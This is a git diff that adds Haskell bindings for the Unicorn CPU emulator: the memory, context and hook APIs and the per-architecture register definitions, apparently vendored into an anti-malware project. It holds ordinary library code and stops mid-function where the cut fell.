+memProtect :: Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Start address of the memory region to + -- modify. This address must be aligned to + -- 4KB, or this will return with an + -- 'ErrArg' error + -> Int -- ^ Size of the memory region to be + -- modified. This size must be a multiple + -- of 4KB, or this will return with an + -- 'ErrArg' error + -> [MemoryPermission] -- ^ New permissions for the mapped region + -> Emulator () -- ^ An 'Error' on failure +memProtect uc address size perms = do + err <- lift $ ucMemProtect uc address size perms + if err == ErrOk then + pure () + else + throwE err + +-- | Retrieve all memory regions mapped by 'memMap'. +memRegions :: Engine -- ^ 'Unicorn' engine handle + -> Emulator [MemoryRegion] -- ^ A list of memory regions +memRegions uc = do + (err, regionPtr, count) <- lift $ ucMemRegions uc + if err == ErrOk then do + regions <- lift $ peekArray count regionPtr + pure regions + else + throwE err + +------------------------------------------------------------------------------- +-- Context operations +------------------------------------------------------------------------------- + +-- | Allocate a region that can be used to perform quick save/rollback of the +-- CPU context, which includes registers and some internal metadata. Contexts +-- may not be shared across engine instances with differing architectures or +-- modes. +contextAllocate :: Engine -- ^ 'Unicon' engine handle + -> Emulator Context -- ^ A CPU context +contextAllocate uc = do + (err, contextPtr) <- lift $ ucContextAlloc uc + if err == ErrOk then + -- Return a CPU context if ucContextAlloc completed successfully + lift $ mkContext contextPtr + else + throwE err + +-- | Save a copy of the internal CPU context. 
+contextSave :: Engine -- ^ 'Unicorn' engine handle + -> Context -- ^ A CPU context + -> Emulator () -- ^ An error on failure +contextSave uc context = do + err <- lift $ ucContextSave uc context + if err == ErrOk then + pure () + else + throwE err + +-- | Restore the current CPU context from a saved copy. +contextRestore :: Engine -- ^ 'Unicorn' engine handle + -> Context -- ^ A CPU context + -> Emulator () -- ^ An error on failure +contextRestore uc context = do + err <- lift $ ucContextRestore uc context + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Misc. +------------------------------------------------------------------------------- + +-- | Combined API version & major and minor version numbers. Returns a +-- hexadecimal number as (major << 8 | minor), which encodes both major and +-- minor versions. +version :: Int +version = + ucVersion nullPtr nullPtr + +-- | Report the 'Error' of the last failed API call. +errno :: Engine -- ^ 'Unicorn' engine handle + -> Emulator Error -- ^ The last 'Error' code +errno = + lift . ucErrno + +-- | Return a string describing the given 'Error'. +strerror :: Error -- ^ The 'Error' code + -> String -- ^ Description of the error code +strerror = + ucStrerror diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs new file mode 100644 index 0000000..138bf17 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Arm +Description : Definitions for the ARM architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the ARM architecture. +-} +module Unicorn.CPU.Arm + ( + Register(..) 
+ ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | ARM registers. +{# enum uc_arm_reg as Register + { underscoreToCase } + omit ( UC_ARM_REG_INVALID + , UC_ARM_REG_ENDING + ) + with prefix = "UC_ARM_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs new file mode 100644 index 0000000..f4f1dec --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Arm64.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Arm64 +Description : Definitions for the ARM64 (ARMv8) architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the ARM64 (ARMv8) architecture. +-} +module Unicorn.CPU.Arm64 + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | ARM64 registers. +{# enum uc_arm64_reg as Register + { underscoreToCase } + omit ( UC_ARM64_REG_INVALID + , UC_ARM64_REG_ENDING + ) + with prefix = "UC_ARM64_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs new file mode 100644 index 0000000..b06ffb3 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/M68k.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Mk68k +Description : Definitions for the MK68K architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the MK68K architecture. +-} +module Unicorn.CPU.M68k + ( + Register(..) 
+ ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | M68K registers. +{# enum uc_m68k_reg as Register + { underscoreToCase } + omit ( UC_M68K_REG_INVALID + , UC_M68K_REG_ENDING + ) + with prefix = "UC_M68K_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs new file mode 100644 index 0000000..8ec5db4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Mips.chs @@ -0,0 +1,65 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Mips +Description : Definitions for the MIPS architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the MIPS architecture. +-} +module Unicorn.CPU.Mips + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | MIPS registers. 
+{# enum UC_MIPS_REG as Register + { underscoreToCase + , UC_MIPS_REG_0 as Reg0g + , UC_MIPS_REG_1 as Reg1g + , UC_MIPS_REG_2 as Reg2g + , UC_MIPS_REG_3 as Reg3g + , UC_MIPS_REG_4 as Reg4g + , UC_MIPS_REG_5 as Reg5g + , UC_MIPS_REG_6 as Reg6g + , UC_MIPS_REG_7 as Reg7g + , UC_MIPS_REG_8 as Reg8g + , UC_MIPS_REG_9 as Reg9g + , UC_MIPS_REG_10 as Reg10g + , UC_MIPS_REG_11 as Reg11g + , UC_MIPS_REG_12 as Reg12g + , UC_MIPS_REG_13 as Reg13g + , UC_MIPS_REG_14 as Reg14g + , UC_MIPS_REG_15 as Reg15g + , UC_MIPS_REG_16 as Reg16g + , UC_MIPS_REG_17 as Reg17g + , UC_MIPS_REG_18 as Reg18g + , UC_MIPS_REG_19 as Reg19g + , UC_MIPS_REG_20 as Reg20g + , UC_MIPS_REG_21 as Reg21g + , UC_MIPS_REG_22 as Reg22g + , UC_MIPS_REG_23 as Reg23g + , UC_MIPS_REG_24 as Reg24g + , UC_MIPS_REG_25 as Reg25g + , UC_MIPS_REG_26 as Reg26g + , UC_MIPS_REG_27 as Reg27g + , UC_MIPS_REG_28 as Reg28g + , UC_MIPS_REG_29 as Reg29g + , UC_MIPS_REG_30 as Reg30g + , UC_MIPS_REG_31 as Reg31 + } + omit ( UC_MIPS_REG_INVALID + , UC_MIPS_REG_ENDING + ) + with prefix = "UC_MIPS_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs new file mode 100644 index 0000000..e54262b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/Sparc.chs @@ -0,0 +1,32 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.Sparc +Description : Definitions for the SPARC architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the SPARC architecture. +-} +module Unicorn.CPU.Sparc + ( + Register(..) + ) where + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | SPARC registers. 
+{# enum uc_sparc_reg as Register + { underscoreToCase } + omit (UC_SPARC_REG_INVALID + , UC_SPARC_REG_ENDING + ) + with prefix = "UC_SPARC_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs new file mode 100644 index 0000000..56608c1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/CPU/X86.chs @@ -0,0 +1,70 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.CPU.X86 +Description : Definitions for the X86 architecture. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Definitions for the X86 architecture. +-} +module Unicorn.CPU.X86 + ( + Mmr(..) + , Register(..) + , Instruction(..) + ) where + +import Control.Applicative +import Data.Word +import Foreign + +import Unicorn.Internal.Core (Reg) + +{# context lib = "unicorn" #} + +#include + +-- | Memory-managemen Register for instructions IDTR, GDTR, LDTR, TR. +-- Borrow from SegmentCache in qemu/target-i386/cpu.h +data Mmr = Mmr + { mmrSelector :: Word16 -- ^ Not used by GDTR and IDTR + , mmrBase :: Word64 -- ^ Handle 32 or 64 bit CPUs + , mmrLimit :: Word32 + , mmrFlags :: Word32 -- ^ Not used by GDTR and IDTR + } + +instance Storable Mmr where + sizeOf _ = {# sizeof uc_x86_mmr #} + alignment _ = {# alignof uc_x86_mmr #} + peek p = Mmr <$> liftA fromIntegral ({# get uc_x86_mmr->selector #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->base #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->limit #} p) + <*> liftA fromIntegral ({# get uc_x86_mmr->flags #} p) + poke p mmr = do + {# set uc_x86_mmr.selector #} p (fromIntegral $ mmrSelector mmr) + {# set uc_x86_mmr.base #} p (fromIntegral $ mmrBase mmr) + {# set uc_x86_mmr.limit #} p (fromIntegral $ mmrLimit mmr) + {# set uc_x86_mmr.flags #} p (fromIntegral $ mmrFlags mmr) + +-- | X86 registers. 
+{# enum uc_x86_reg as Register + { underscoreToCase } + omit ( UC_X86_REG_INVALID + , UC_X86_REG_ENDING + ) + with prefix = "UC_X86_REG_" + deriving (Show, Eq, Bounded) +#} + +instance Reg Register + +-- | X86 instructions. +{# enum uc_x86_insn as Instruction + { underscoreToCase } + omit ( UC_X86_INS_INVALID + , UC_X86_INS_ENDING + ) + with prefix = "UC_X86_INS_" + deriving (Show, Eq, Bounded) +#} diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs new file mode 100644 index 0000000..0af53fd --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Hook.hs @@ -0,0 +1,216 @@ +{-| +Module : Unicorn.Hook +Description : Unicorn hooks. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Insert hook points into the Unicorn emulator engine. +-} +module Unicorn.Hook + ( -- * Hook types + Hook + , MemoryHookType(..) + , MemoryEventHookType(..) + , MemoryAccess(..) + + -- * Hook callbacks + , CodeHook + , InterruptHook + , BlockHook + , InHook + , OutHook + , SyscallHook + , MemoryHook + , MemoryReadHook + , MemoryWriteHook + , MemoryEventHook + + -- * Hook callback management + , codeHookAdd + , interruptHookAdd + , blockHookAdd + , inHookAdd + , outHookAdd + , syscallHookAdd + , memoryHookAdd + , memoryEventHookAdd + , hookDel + ) where + +import Control.Monad +import Control.Monad.Trans.Class +import Control.Monad.Trans.Except (ExceptT (..), throwE) +import Foreign + +import Unicorn.Internal.Core +import Unicorn.Internal.Hook +import qualified Unicorn.CPU.X86 as X86 + +------------------------------------------------------------------------------- +-- Hook callback management (registration and deletion) +------------------------------------------------------------------------------- + +-- | Register a callback for a code hook event. 
+codeHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> CodeHook a -- ^ Code hook callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +codeHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalCodeHook callback + getResult $ ucHookAdd uc HookCode funPtr userDataPtr begin end + +-- | Register a callback for an interrupt hook event. +interruptHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> InterruptHook a -- ^ Interrupt callback + -> a -- ^ User-defined data. This will be passed + -- to the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or 'Error' + -- on failure +interruptHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalInterruptHook callback + getResult $ ucHookAdd uc HookIntr funPtr userDataPtr begin end + +-- | Register a callback for a block hook event. +blockHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> BlockHook a -- ^ Block callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +blockHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalBlockHook callback + getResult $ ucHookAdd uc HookBlock funPtr userDataPtr begin end + +-- | Register a callback for an IN instruction hook event (X86). +inHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> InHook a -- ^ IN instruction callback + -> a -- ^ User-defined data. 
This will be passed to the + -- callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on + -- failure +inHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalInHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.In + +-- | Register a callback for an OUT instruction hook event (X86). +outHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> OutHook a -- ^ OUT instruction callback + -> a -- ^ User-defined data. This will be passed to the + -- callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' on + -- failure +outHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalOutHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.Out + +-- | Register a callback for a SYSCALL instruction hook event (X86). +syscallHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> SyscallHook a -- ^ SYSCALL instruction callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +syscallHookAdd uc callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalSyscallHook callback + getResult $ ucInsnHookAdd uc HookInsn funPtr userDataPtr begin end + X86.Syscall + +-- | Register a callback for a valid memory access event. +memoryHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> MemoryHookType -- ^ A valid memory access (e.g. read, write, + -- etc.) 
to trigger the callback on + -> MemoryHook a -- ^ Memory access callback + -> a -- ^ User-defined data. This will be passed to + -- the callback function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or an 'Error' + -- on failure +memoryHookAdd uc memHookType callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalMemoryHook callback + getResult $ ucHookAdd uc memHookType funPtr userDataPtr begin end + +-- | Register a callback for an invalid memory access event. +memoryEventHookAdd :: Storable a + => Engine -- ^ 'Unicorn' engine handle + -> MemoryEventHookType -- ^ An invalid memory access (e.g. + -- read, write, etc.) to trigger + -- the callback on + -> MemoryEventHook a -- ^ Invalid memory access callback + -> a -- ^ User-defined data. This will + -- be passed to the callback + -- function + -> Word64 -- ^ Start address + -> Word64 -- ^ End address + -> Emulator Hook -- ^ The hook handle on success, or + -- an 'Error' on failure +memoryEventHookAdd uc memEventHookType callback userData begin end = + ExceptT . alloca $ \userDataPtr -> do + poke userDataPtr userData + funPtr <- marshalMemoryEventHook callback + getResult $ ucHookAdd uc memEventHookType funPtr userDataPtr begin end + +-- | Unregister (remove) a hook callback. 
+hookDel :: Engine -- ^ 'Unicorn' engine handle + -> Hook -- ^ 'Hook' handle + -> Emulator () -- ^ 'ErrOk' on success, or other value on failure +hookDel uc hook = do + err <- lift $ ucHookDel uc hook + if err == ErrOk then + pure () + else + throwE err + +------------------------------------------------------------------------------- +-- Helper functions +------------------------------------------------------------------------------- + +-- Takes the tuple returned by `ucHookAdd`, an IO (Error, Hook), and +-- returns either a `Right Hook` if no error occurred or a `Left Error` if an +-- error occurred +getResult :: IO (Error, Hook) + -> IO (Either Error Hook) +getResult = + liftM (uncurry checkResult) + where checkResult err hook = + if err == ErrOk then + Right hook + else + Left err diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs new file mode 100644 index 0000000..762669d --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Core.chs @@ -0,0 +1,54 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.Internal.Core +Description : Core Unicorn components. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Defines core Unicorn components. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Core where + +import Control.Monad +import Control.Monad.Trans.Except (ExceptT) +import Foreign + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +-- | The Unicorn engine. +{# pointer *uc_engine as Engine + foreign finalizer uc_close_wrapper as close + newtype +#} + +-- | A pointer to a Unicorn engine. +{# pointer *uc_engine as EnginePtr -> Engine #} + +-- | Make a new Unicorn engine out of an engine pointer. 
The returned Unicorn +-- engine will automatically call 'uc_close_wrapper' when it goes out of scope. +mkEngine :: EnginePtr + -> IO Engine +mkEngine ptr = + liftM Engine (newForeignPtr close ptr) + +-- | Errors encountered by the Unicorn API. These values are returned by +-- 'errno'. +{# enum uc_err as Error + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | The emulator runs in the IO monad and allows for the handling of errors +-- "under the hood". +type Emulator a = ExceptT Error IO a + +-- | An architecture-dependent register. +class Enum a => Reg a diff --git a/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs new file mode 100644 index 0000000..261adf1 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/bindings/haskell/src/Unicorn/Internal/Hook.chs @@ -0,0 +1,445 @@ +{-# LANGUAGE ForeignFunctionInterface #-} + +{-| +Module : Unicorn.Internal.Hook +Description : Unicorn hooks. +Copyright : (c) Adrian Herrera, 2016 +License : GPL-2 + +Low-level bindings for inserting hook points into the Unicorn emulator engine. + +This module should not be directly imported; it is only exposed because of the +way cabal handles ordering of chs files. +-} +module Unicorn.Internal.Hook + ( -- * Types + Hook + , HookType(..) + , MemoryHookType(..) + , MemoryEventHookType(..) + , MemoryAccess(..) 
+ + -- * Hook callback bindings + , CodeHook + , InterruptHook + , BlockHook + , InHook + , OutHook + , SyscallHook + , MemoryHook + , MemoryReadHook + , MemoryWriteHook + , MemoryEventHook + + -- * Hook marshallin + , marshalCodeHook + , marshalInterruptHook + , marshalBlockHook + , marshalInHook + , marshalOutHook + , marshalSyscallHook + , marshalMemoryHook + , marshalMemoryReadHook + , marshalMemoryWriteHook + , marshalMemoryEventHook + + -- * Hook registration and deletion bindings + , ucHookAdd + , ucInsnHookAdd + , ucHookDel + ) where + +import Control.Monad +import Foreign + +import Unicorn.Internal.Util + +{# import Unicorn.Internal.Core #} +{# import Unicorn.CPU.X86 #} + +{# context lib = "unicorn" #} + +#include +#include "unicorn_wrapper.h" + +------------------------------------------------------------------------------- +-- Types +------------------------------------------------------------------------------- + +-- When we pass a Unicorn engine to a hook callback, we do not want this engine +-- object to be freed automatically when the callback returns (which is what +-- would typically occur when using a ForeignPtr), because we want to continue +-- using the Unicorn engine outside the callback. To avoid this, +-- unicorn_wrapper.h provides a dummy "close" function that does nothing. When +-- we go to create a Unicorn engine to pass to a callback, we use a pointer to +-- this dummy close function as the finalizer pointer. When the callback +-- returns, the Unicorn engine remains untouched! +-- +-- XX Is there a better way to do this? +foreign import ccall "&uc_close_dummy" + closeDummy :: FunPtr (EnginePtr -> IO ()) + +mkEngineNC :: EnginePtr + -> IO Engine +mkEngineNC ptr = + liftM Engine (newForeignPtr closeDummy ptr) + +-- | A Unicorn hook. +type Hook = {# type uc_hook #} + +-- Hook types. These are used internally within this module by the callback +-- registration functions and are not exposed to the user. 
+-- +-- Note that the both valid and invalid memory access hooks are omitted from +-- this enum (and are exposed to the user). +{# enum uc_hook_type as HookType + { underscoreToCase } + omit ( UC_HOOK_MEM_READ_UNMAPPED + , UC_HOOK_MEM_WRITE_UNMAPPED + , UC_HOOK_MEM_FETCH_UNMAPPED + , UC_HOOK_MEM_READ_PROT + , UC_HOOK_MEM_WRITE_PROT + , UC_HOOK_MEM_FETCH_PROT + , UC_HOOK_MEM_READ + , UC_HOOK_MEM_WRITE + , UC_HOOK_MEM_FETCH + , UC_HOOK_MEM_READ_AFTER + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory hook types (for valid memory accesses). +{# enum uc_hook_type as MemoryHookType + { underscoreToCase } + omit ( UC_HOOK_INTR + , UC_HOOK_INSN + , UC_HOOK_CODE + , UC_HOOK_BLOCK + , UC_HOOK_MEM_READ_UNMAPPED + , UC_HOOK_MEM_WRITE_UNMAPPED + , UC_HOOK_MEM_FETCH_UNMAPPED + , UC_HOOK_MEM_READ_PROT + , UC_HOOK_MEM_WRITE_PROT + , UC_HOOK_MEM_FETCH_PROT + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Memory event hook types (for invalid memory accesses). +{# enum uc_hook_type as MemoryEventHookType + { underscoreToCase } + omit ( UC_HOOK_INTR + , UC_HOOK_INSN + , UC_HOOK_CODE + , UC_HOOK_BLOCK + , UC_HOOK_MEM_READ + , UC_HOOK_MEM_WRITE + , UC_HOOK_MEM_FETCH + , UC_HOOK_MEM_READ_AFTER + ) + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +-- | Unify the hook types with a type class +class Enum a => HookTypeC a + +instance HookTypeC HookType +instance HookTypeC MemoryHookType +instance HookTypeC MemoryEventHookType + +-- | Memory access. +{# enum uc_mem_type as MemoryAccess + { underscoreToCase } + with prefix = "UC_" + deriving (Show, Eq, Bounded) +#} + +------------------------------------------------------------------------------- +-- Hook callbacks +------------------------------------------------------------------------------- + +-- | Callback function for tracing code. 
+type CodeHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Addres where the code is being executed + -> Maybe Int -- ^ Size of machine instruction(s) being + -- executed, or 'Nothing' when size is unknown + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CCodeHook = EnginePtr -> Word64 -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkCodeHook :: CCodeHook + -> IO {# type uc_cb_hookcode_t #} + +marshalCodeHook :: Storable a + => CodeHook a + -> IO {# type uc_cb_hookcode_t #} +marshalCodeHook codeHook = + mkCodeHook $ \ucPtr address size userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let maybeSize = if size == 0 then Nothing + else Just $ fromIntegral size + codeHook uc address maybeSize userData + +-- | Callback function for tracing interrupts. +type InterruptHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Interrupt number + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CInterruptHook = EnginePtr -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkInterruptHook :: CInterruptHook -> IO {# type uc_cb_hookintr_t #} + +marshalInterruptHook :: Storable a + => InterruptHook a + -> IO {# type uc_cb_hookintr_t #} +marshalInterruptHook interruptHook = + mkInterruptHook $ \ucPtr intNo userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + interruptHook uc (fromIntegral intNo) userData + +-- | Callback function for tracing blocks. +type BlockHook a = CodeHook a + +marshalBlockHook :: Storable a + => BlockHook a + -> IO {# type uc_cb_hookcode_t #} +marshalBlockHook = + marshalCodeHook + +-- | Callback function for tracing IN instructions (X86). 
+type InHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Port number + -> Int -- ^ Data size (1/2/4) to be read from this port + -> a -- ^ User data passed to tracing APIs + -> IO Word32 -- ^ The data read from the port + +type CInHook = EnginePtr -> Word32 -> Int32 -> Ptr () -> IO Word32 + +foreign import ccall "wrapper" + mkInHook :: CInHook -> IO {# type uc_cb_insn_in_t #} + +marshalInHook :: Storable a + => InHook a + -> IO {# type uc_cb_insn_in_t #} +marshalInHook inHook = + mkInHook $ \ucPtr port size userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + inHook uc (fromIntegral port) (fromIntegral size) userData + +-- | Callback function for tracing OUT instructions (X86). +type OutHook a = Engine -- ^ 'Unicorn' engine handle + -> Int -- ^ Port number + -> Int -- ^ Data size (1/2/4) to be written to this port + -> Int -- ^ Data value to be written to this port + -> a -- ^ User data passed to tracing APIs + -> IO () + +type COutHook = EnginePtr -> Word32 -> Int32 -> Word32 -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkOutHook :: COutHook + -> IO {# type uc_cb_insn_out_t #} + +marshalOutHook :: Storable a + => OutHook a + -> IO {# type uc_cb_insn_out_t #} +marshalOutHook outHook = + mkOutHook $ \ucPtr port size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + outHook uc (fromIntegral port) (fromIntegral size) (fromIntegral value) + userData + +-- | Callback function for tracing SYSCALL instructions (X86). 
+type SyscallHook a = Engine -- ^ 'Unicorn' engine handle + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CSyscallHook = Ptr () -> Ptr () -> IO () + +foreign import ccall "wrapper" + mkSyscallHook :: CSyscallHook + -> IO {# type uc_cb_insn_syscall_t #} + +marshalSyscallHook :: Storable a + => SyscallHook a + -> IO {# type uc_cb_insn_syscall_t #} +marshalSyscallHook syscallHook = + mkSyscallHook $ \ucPtr userDataPtr -> do + uc <- mkEngineNC $ castPtr ucPtr + userData <- castPtrAndPeek userDataPtr + syscallHook uc userData + +-- | Callback function for hooking memory operations. +type MemoryHook a = Engine -- ^ 'Unicorn' engine handle + -> MemoryAccess -- ^ Memory access; read or write + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being read or written + -> Maybe Int -- ^ Value of data being wrriten, or + -- 'Nothing' if read + -> a -- ^ User data passed to tracing APIs + -> IO () + +type CMemoryHook = EnginePtr + -> Int32 + -> Word64 + -> Int32 + -> Int64 + -> Ptr () + -> IO () + +foreign import ccall "wrapper" + mkMemoryHook :: CMemoryHook + -> IO {# type uc_cb_hookmem_t #} + +marshalMemoryHook :: Storable a + => MemoryHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryHook memoryHook = + mkMemoryHook $ \ucPtr memAccessI address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + let memAccess = toMemAccess memAccessI + maybeValue = case memAccess of + MemRead -> Nothing + MemWrite -> Just $ fromIntegral value + _ -> error "Invalid memory access" + memoryHook uc memAccess address (fromIntegral size) maybeValue userData + +-- | Callback function for hooking memory reads. 
+type MemoryReadHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where the code is being executed + -> Int -- ^ Size of data being read + -> a -- ^ User data passed to tracing APIs + -> IO () + +marshalMemoryReadHook :: Storable a + => MemoryReadHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryReadHook memoryReadHook = + mkMemoryHook $ \ucPtr _ address size _ userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- castPtrAndPeek userDataPtr + memoryReadHook uc address (fromIntegral size) userData + +-- | Callback function for hooking memory writes. +type MemoryWriteHook a = Engine -- ^ 'Unicorn' engine handle + -> Word64 -- ^ Address where the code is being + -- executed + -> Int -- ^ Size of data being written + -> Int -- ^ Value of data being written + -> a -- ^ User data passed to tracing APIs + -> IO () + +marshalMemoryWriteHook :: Storable a + => MemoryWriteHook a + -> IO {# type uc_cb_hookmem_t #} +marshalMemoryWriteHook memoryWriteHook = + mkMemoryHook $ \ucPtr _ address size value userDataPtr -> do + uc <- mkEngineNC ucPtr + userData <- 